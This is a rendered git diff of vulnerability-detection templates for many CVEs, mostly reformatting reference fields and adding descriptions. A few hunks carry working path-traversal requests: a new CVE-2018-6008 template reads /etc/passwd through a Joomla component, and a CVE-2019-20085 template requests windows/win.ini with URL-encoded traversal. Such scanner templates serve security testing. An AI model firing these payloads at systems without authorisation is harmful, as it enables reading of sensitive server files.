description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7].*'

View File

@ -4,9 +4,9 @@ info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342 - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi tags: cve,cve2018,iot,lfi
requests: requests:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: | reference:
- https://www.exploit-db.com/exploits/45440 - https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288 - https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: | reference:
- https://www.exploit-db.com/exploits/45780 - https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458 - https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: | reference:
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470 - https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
author: daffainfo author: daffainfo
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
reference: | reference:
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/ - https://www.cvedetails.com/cve/CVE-2018-20985/
severity: high severity: high

27
CVE-2018-6008.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-6008
info:
name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
author: daffainfo
severity: high
description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
reference:
- https://www.exploit-db.com/exploits/43913
- https://www.cvedetails.com/cve/CVE-2018-6008
tags: cve,cve2018,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: | reference:
- https://security401.com/grandnode-path-traversal/ - https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276 - https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi tags: cve,cve2019,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference: | reference:
- https://www.exploit-db.com/exploits/47214 - https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312 - https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi tags: cve,cve2019,lfi

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/9815 - https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin

View File

@ -4,8 +4,8 @@ info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo,dhiyaneshDk author: daffainfo,dhiyaneshDk
severity: medium severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: | reference:
- https://wpscan.com/vulnerability/9267 - https://wpscan.com/vulnerability/9267
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin

View File

@ -4,7 +4,10 @@ info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin
requests: requests:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: | reference:
- https://plugins.trac.wordpress.org/changeset/2152730 - https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers - https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311 - https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi tags: cve,cve2019,iot,lfi
@ -13,7 +13,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26 - https://seclists.org/fulldisclosure/2019/Mar/26
tags: cve,cve2019,wordpress,wp-plugin,lfi tags: cve,cve2019,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference: | reference:
- https://www.exploit-db.com/exploits/48297 - https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455 - https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
reference: | reference:
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -4,7 +4,8 @@ info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395 - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
tags: cve,cve2020,wordpress,xss,wp-plugin tags: cve,cve2020,wordpress,xss,wp-plugin

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: | reference:
- https://www.exploit-db.com/exploits/49343 - https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598 - https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: | reference:
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241 - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router tags: cve,cve2021,iot,lfi,router

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: | reference:
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin tags: cve,cve2021,wordpress,xss,wp-plugin

Some files were not shown because too many files have changed in this diff Show More